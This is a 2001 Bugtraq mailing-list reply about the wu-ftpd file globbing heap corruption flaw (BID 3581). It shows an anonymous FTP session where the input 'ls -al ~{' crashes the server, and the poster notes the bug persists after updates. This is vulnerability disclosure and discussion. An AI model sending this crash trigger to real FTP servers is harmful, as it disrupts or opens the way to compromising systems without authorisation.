Bugtraq mailing list archives
Re: *ALERT* BID 3581: Wu-Ftpd File Globbing Heap Corruption Vulnerability
From: <goba () Leu Braila Astral Ro>
Date: Sun, 2 Dec 2001 18:07:34 +0200 (EET)
On Fri, 30 Nov 2001, Hasan Azam Diwan wrote:
Darwin's ftpd is not vulnerable... the "ls ~{" command returns a list of ~root.
[teste@XXX teste]$ ftp test.somehost.com
Connected to test.somehost.com.
220 Test.somehost.com FTP server (Version wu-2.6.1-16.7x.1) ready.
530 Please login with USER and PASS.
530 Please login with USER and PASS.
KERBEROS_V4 rejected as an authentication type
Name (test:teste): ftp
331 Guest login ok, send your complete e-mail address as password.
Password:
230-The response 'baubau' is not valid
230-Next time please use your e-mail address as your password
230- for example: joe () test somehost com
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls ~{
227 Entering Passive Mode (194,105,27,22,166,166)
550 Missing }
ftp> ls -al ~{
Segmentation fault (core dumped)

As you can see, the problem still exists, even if updates are done.

Goba